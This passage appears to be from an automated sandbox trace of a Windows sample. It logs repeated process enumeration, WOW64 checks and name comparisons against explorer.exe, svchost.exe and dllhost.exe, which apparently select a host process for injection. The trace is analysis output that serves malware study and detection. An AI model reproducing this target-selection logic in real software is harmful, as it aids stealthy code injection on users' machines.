dwProcessId=0x310) returned 0xd8 [0208.624] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.624] CloseHandle (hObject=0xd8) returned 1 [0208.624] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0208.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0208.624] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.624] CloseHandle (hObject=0xd8) returned 1 [0208.624] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0208.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0208.625] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.625] CloseHandle (hObject=0xd8) returned 1 [0208.625] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0208.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0208.625] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.625] CloseHandle (hObject=0xd8) returned 1 [0208.626] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0208.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0208.626] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.626] CloseHandle (hObject=0xd8) returned 1 [0208.626] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0208.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0208.627] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.627] CloseHandle (hObject=0xd8) returned 1 [0208.627] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0208.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0208.627] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.627] CloseHandle (hObject=0xd8) returned 1 [0208.627] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0208.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0208.628] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.628] CloseHandle (hObject=0xd8) returned 1 [0208.628] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0208.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0208.628] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.628] CloseHandle (hObject=0xd8) returned 1 [0208.628] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0208.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0208.629] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.629] CloseHandle (hObject=0xd8) returned 1 [0208.629] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0208.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0208.630] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.630] CloseHandle (hObject=0xd8) returned 1 [0208.630] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0208.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0208.630] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.630] CloseHandle (hObject=0xd8) returned 1 [0208.630] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0208.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0208.631] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.631] CloseHandle (hObject=0xd8) returned 1 [0208.631] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0208.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0208.631] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.631] CloseHandle (hObject=0xd8) returned 1 [0208.631] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0208.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0208.632] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.632] CloseHandle (hObject=0xd8) returned 1 [0208.632] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0208.632] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0208.633] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0208.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0208.633] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0208.634] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0208.634] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0208.635] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0208.635] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.636] CloseHandle (hObject=0xd8) returned 1 [0208.636] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0208.636] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0208.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0208.636] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.636] CloseHandle (hObject=0xd8) returned 1 [0208.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0208.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0208.636] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0208.636] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0208.637] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0208.637] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.637] CloseHandle (hObject=0xd8) returned 1 [0208.637] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0208.638] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.638] CloseHandle (hObject=0xd8) returned 1 [0208.638] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0208.638] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0208.638] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.639] CloseHandle (hObject=0xd8) returned 1 [0208.639] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.639] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0208.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0208.640] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0208.640] CloseHandle (hObject=0xd8) returned 1 [0208.640] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0208.640] CloseHandle (hObject=0xd4) returned 1 [0208.640] Sleep (dwMilliseconds=0x3e8) [0209.643] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0209.645] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0209.646] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0209.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0209.646] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0209.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0209.647] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0209.647] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0209.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0209.648] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0209.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0209.648] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0209.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0209.649] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0209.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0209.649] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0209.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0209.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0209.650] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0209.650] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0209.651] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.651] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0209.651] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0209.652] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.652] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0209.652] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0209.653] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0209.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0209.653] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0209.654] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0209.654] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0209.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0209.655] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.655] CloseHandle (hObject=0xd8) returned 1 [0209.655] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0209.655] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0209.655] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0209.655] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0209.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0209.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0209.656] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0209.656] CloseHandle (hObject=0xd8) returned 1 [0209.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0209.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0209.656] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0209.656] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0209.657] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0209.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0209.658] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0209.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0209.658] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 